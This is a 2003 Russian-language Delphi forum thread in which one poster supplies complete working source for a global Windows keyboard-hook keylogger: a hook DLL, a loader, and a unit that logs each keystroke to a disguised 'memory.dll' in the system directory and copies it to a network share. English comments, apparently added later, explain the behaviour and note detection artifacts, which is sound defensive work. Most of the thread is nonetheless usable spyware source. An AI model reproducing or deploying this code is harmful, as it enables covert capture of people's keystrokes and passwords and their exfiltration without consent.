
KeyLoger   Найти похожие ветки 

 
FoXx   (2003-01-03 20:23) [0]

Помогите plz, нужен исходник keylogger'а: тот, который в статье по установке hooks, у меня почему-то дублирует все нажатые клавиши. Если кто знает, в чём дело, plz напишите!


 
Юрий Зотов   (2003-01-03 20:37) [1]

Клавишу мы сначала НАЖИМАЕМ, так?
А потом ОТПУСКАЕМ, так?

Этого достаточно.


 
FoXx   (2003-01-03 20:54) [2]

Так это в примере учтено! Но все равно они дублируются!


 
Song   (2003-01-04 08:57) [3]

Ошибка в 17-ой строке.


 
Севостьянов Игорь   (2003-01-04 12:57) [4]

Не знаю, что там в статье, когда-то сам написал, как ты выразился, "KeyLoger":
Вот рабочий код:

library KbdAgnt;

uses Windows,
KeyboardHook in "KeyboardHook.pas";

// The DLL's only export is the keyboard hook callback implemented in
// KeyboardHook.pas; the loader program resolves it by this name.
exports
KeyboardProc;

// Handle and mapped view of the named shared-memory section created in the
// library initialisation code and released in DLLMain on process detach.
var
hFileMappingObject: THandle;
lpvMem: Pointer;


//----------------------------//
// DLL_PROCESS_DETACH //
//----------------------------//

// DLL notification callback, installed through DLLProc by the library
// initialisation code.
//   Reason - the DLL_* notification code passed in by the runtime.
// Only DLL_PROCESS_DETACH is handled: the mapped view is unmapped and the
// file-mapping handle is closed. Every other reason is ignored.
procedure DLLMain(Reason: Integer);
begin

if Reason = DLL_PROCESS_DETACH then
begin
// Release the view first, then the section handle it was created from.
UnmapViewOfFile(lpvMem);
CloseHandle(hFileMappingObject);
end;

end;

//----------------------------//
// DLL_PROCESS_ATTACH //
//----------------------------//

// Library initialisation code: runs when the DLL is loaded into a process.
// It registers DLLMain for later notifications, then creates (or opens, if it
// already exists) a 4096-byte named section backed by the paging file and maps
// it into the current process. On a failed check it sets ExitCode to 1 and
// leaves the initialisation block.
// NOTE(review): nothing visible on this page reads or writes lpvMem after it
// is mapped - confirm against the full project before assuming it carries data.
// Triage note: because a keyboard-hook DLL is loaded into the processes that
// receive keystrokes, the section name "HookAgentShareMem" and the module name
// KbdAgnt.dll showing up in unrelated GUI processes are host artifacts worth
// searching for.
begin
DLLProc := @DLLMain;

hFileMappingObject := CreateFileMapping(
THandle($FFFFFFFF), // use paging file
nil, // no security attributes
PAGE_READWRITE, // read/write access
0, // size: high 32 bits
4096, // size: low 32 bits
"HookAgentShareMem" // name of map object
);

if hFileMappingObject = INVALID_HANDLE_VALUE then
begin
ExitCode := 1;
Exit;
end;

lpvMem := MapViewOfFile(
hFileMappingObject, // object to map view of
FILE_MAP_WRITE, // read/write access
0, // high offset: map from
0, // low offset: beginning
0 // default: map entire file
);

if lpvMem = nil then
begin
// Mapping failed: drop the section handle before reporting failure.
CloseHandle(hFileMappingObject);
ExitCode := 1;
Exit;
end;

end.
---------
unit KeyboardHook;

interface

uses Windows, Classes, SysUtils, Messages;

const
// Name appended to the Windows system directory to form the local log path.
// The file carries a .dll extension, but SaveToFile writes plain text into it.
LocalFileName: string = "\memory.dll";
// Second copy of the log, written to a UNC share path. The .sys extension is
// likewise not a driver; SaveToFile writes the same text here.
FarFileName: string = "\\MAN-NT\Common\keyboard.sys";
// Size threshold in bytes (1 MiB) above which the local log is deleted.
MaxFileSize = 1048576;
var
// Hook handle passed to CallNextHookEx in KeyboardProc.
// NOTE(review): no assignment to hCurrentHook is visible on this page.
hCurrentHook: HHOOK;
// Full path of the local log file, rebuilt on every SaveToFile call.
FileName: string;

function KeyboardProc(hCode: Integer; vkCode: WPARAM;
ksMsgInf: LPARAM ): LRESULT; stdcall;

implementation

uses Dialogs;

{$I Scancode.inc}

// Appends the textual tag for one key code to two log files.
//   vkCode - key code received by the hook callback; translated to text by
//            CodeToChar (Scancode.inc).
// The local log is <Windows system directory> + LocalFileName, the second copy
// goes to FarFileName. Both files are opened, written and closed on every call.
// Triage note: the observable behaviour is a text file named memory.dll in the
// system directory and writes to \\MAN-NT\Common\keyboard.sys on each key-down;
// both files contain bracketed key tags rather than PE data.
procedure SaveToFile(vkCode: WPARAM);
const
// Local redeclaration used for the FindFirstFile result check below.
INVALID_HANDLE_VALUE = -1;
var
LocalFile,
FarFile: TextFile;
WinSysDir: array[0..MAX_PATH] of char;
SearchInfo32: WIN32_FIND_DATA;
Find32Handle: LongInt;
begin
// Build the local path; FileName stays empty if the system directory lookup fails.
FileName := EmptyStr;
if GetSystemDirectory(WinSysDir, MAX_PATH) <> 0 then
FileName := StrPas(WinSysDir) + LocalFileName;
//FileName := "c:\temp" + LocalFileName;

AssignFile(LocalFile, FileName);
AssignFile(FarFile, FarFileName);
// I/O checking is switched off so that the open calls below do not raise.
{$I-}
//==================================================
// Size cap: if the local log exists, is not a directory and its low size
// DWORD exceeds MaxFileSize, delete it so it is recreated below.
try
Find32Handle := FindFirstFile(PChar(FileName), SearchInfo32);
if Find32Handle <> INVALID_HANDLE_VALUE then
if ((SearchInfo32.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0) then
if SearchInfo32.nFileSizeLow > MaxFileSize then DeleteFile(FileName);
except;
end;
//==================================================
// Create each file when it is missing, otherwise open it for appending.
if not FileExists(FileName) then
Rewrite(LocalFile)
else
Append(LocalFile);

if not FileExists(FarFileName) then
Rewrite(FarFile)
else
Append(FarFile);
// I/O checking is back on for the writes.
{$I+}
try
Write(LocalFile, CodeToChar(vkCode));
Write(FarFile, CodeToChar(vkCode));
finally
// Both files are closed whether or not the writes succeeded.
CloseFile(FarFile);
CloseFile(LocalFile);
end;
end;

// WH_KEYBOARD hook callback exported by the DLL.
//   hCode    - hook code; only HC_ACTION is acted on.
//   vkCode   - virtual-key code of the key.
//   ksMsgInf - keystroke message flags; the KF_UP bit in the high word marks
//              a key release.
// Returns the result of CallNextHookEx, so the event always continues down
// the hook chain.
// A keystroke is logged only when the KF_UP bit is clear, i.e. on key-down
// events; releases are skipped.
// NOTE(review): hCurrentHook is not assigned anywhere in the code shown here.
function KeyboardProc(hCode: Integer; vkCode: WPARAM;
ksMsgInf: LPARAM ): LRESULT;
begin
if (hCode = HC_ACTION) and
((HiWord(ksMsgInf) and KF_UP) = 0) then SaveToFile(vkCode);
Result := CallNextHookEx(hCurrentHook, hCode, vkCode, ksMsgInf);
end;

end.
-----------------------------------------------
// Loader program: loads KbdAgnt.dll, resolves its exported KeyboardProc and
// installs it as a WH_KEYBOARD hook, then sits in a message loop.
// The last SetWindowsHookEx argument (thread id) is 0, which requests a hook
// for all threads on the desktop rather than one thread of this process.
// None of the three API results is checked, and the hook handle returned by
// SetWindowsHookEx is discarded; no UnhookWindowsHookEx call is visible.
// Detection note: the combination to alert on is a process calling
// SetWindowsHookEx(WH_KEYBOARD, ..., 0) with a procedure from a DLL that then
// appears as a loaded module in unrelated interactive processes.
program kbdsrv;
uses
Windows,
Dialogs;

const
// The DLL is named without a path, so it is located through the normal DLL
// search order.
KBDHOOKDLL = "KbdAgnt.dll";
var
hinstDLL: HINST;
hkprcKeyboard: TFNHookProc;
msg: TMsg;

begin
hinstDLL := LoadLibrary(KBDHOOKDLL);
hkprcKeyboard := GetProcAddress(hinstDLL, "KeyboardProc");
SetWindowsHookEx(WH_KEYBOARD, hkprcKeyboard, hinstDLL, 0);
// Keeps the process alive by retrieving messages until GetMessage returns
// False; the retrieved messages are not dispatched.
repeat until not GetMessage(msg, 0, 0, 0);
end.


 
Севостьянов Игорь   (2003-01-04 13:02) [5]

Да забыл еще вот это

Scancode.inc:

// Translates a key code into the bracketed text tag that is written to the log.
//   Code - key code as received by the hook callback.
// Returns the tag with a trailing space. The case statement has no else
// branch, so Result is not assigned here for codes that are not listed.
// Notes for anyone reading a recovered log:
//   - letters are always written in lower case; Shift, Ctrl, Alt and CapsLock
//     appear only as separate tags, so case and shifted symbols must be
//     inferred from the surrounding tags;
//   - the digit row and the numeric keypad produce the same tags ("[0]".."[9]",
//     "[+]", "[-]", "[/]"), and "[Delete]" covers both codes 046 and 110;
//   - codes 033 (VK_PRIOR, Page Up) and 034 (VK_NEXT, Page Down) both map to
//     "[PgDn]", so that tag is ambiguous.
function CodeToChar(Code: WPARAM): string;
begin
Case Code of
027 : Result := "[Esc] ";
112 : Result := "[F1] ";
113 : Result := "[F2] ";
114 : Result := "[F3] ";
115 : Result := "[F4] ";
116 : Result := "[F5] ";
117 : Result := "[F6] ";
118 : Result := "[F7] ";
119 : Result := "[F8] ";
120 : Result := "[F9] ";
121 : Result := "[F10] ";
122 : Result := "[F11] ";
123 : Result := "[F12] ";
145 : Result := "[ScrollLock] ";
019 : Result := "[Pause/Break] ";
192 : Result := "[~] ";
049 : Result := "[1] ";
050 : Result := "[2] ";
051 : Result := "[3] ";
052 : Result := "[4] ";
053 : Result := "[5] ";
054 : Result := "[6] ";
055 : Result := "[7] ";
056 : Result := "[8] ";
057 : Result := "[9] ";
048 : Result := "[0] ";
189 : Result := "[-] ";
187 : Result := "[+] ";
220 : Result := "[\] ";
008 : Result := "[BackSpace] ";
045 : Result := "[Insert] ";
036 : Result := "[Home] ";
033 : Result := "[PgDn] ";
009 : Result := "[Tab] ";
144 : Result := "[NumLock] ";
111 : Result := "[/] ";
106 : Result := "[*] ";
109 : Result := "[-] ";
081 : Result := "[q] ";
087 : Result := "[w] ";
069 : Result := "[e] ";
082 : Result := "[r] ";
084 : Result := "[t] ";
089 : Result := "[y] ";
085 : Result := "[u] ";
073 : Result := "[i] ";
079 : Result := "[o] ";
080 : Result := "[p] ";
219 : Result := "[[] ";
221 : Result := "[]] ";
013 : Result := "[Enter] ";
046 : Result := "[Delete] ";
035 : Result := "[End] ";
034 : Result := "[PgDn] ";
103 : Result := "[7] ";
104 : Result := "[8] ";
105 : Result := "[9] ";
107 : Result := "[+] ";
020 : Result := "[CapsLock] ";
065 : Result := "[a] ";
083 : Result := "[s] ";
068 : Result := "[d] ";
070 : Result := "[f] ";
071 : Result := "[g] ";
072 : Result := "[h] ";
074 : Result := "[j] ";
075 : Result := "[k] ";
076 : Result := "[l] ";
186 : Result := "[;] ";
222 : Result := "[""""] ";
100 : Result := "[4] ";
101 : Result := "[5] ";
102 : Result := "[6] ";
016 : Result := "[Shift] ";
090 : Result := "[z] ";
088 : Result := "[x] ";
067 : Result := "[c] ";
086 : Result := "[v] ";
066 : Result := "[b] ";
078 : Result := "[n] ";
077 : Result := "[m] ";
188 : Result := "[,] ";
190 : Result := "[.] ";
191 : Result := "[/] ";
038 : Result := "[Up] ";
097 : Result := "[1] ";
098 : Result := "[2] ";
099 : Result := "[3] ";
017 : Result := "[Ctrl] ";
091 : Result := "[WinMainMenu] ";
018 : Result := "[Alt] ";
032 : Result := "[Space] ";
093 : Result := "[WinPopUpMenu] ";
037 : Result := "[Left] ";
040 : Result := "[Down] ";
039 : Result := "[Right] ";
096 : Result := "[0] ";
110 : Result := "[Delete] ";
end;
end;


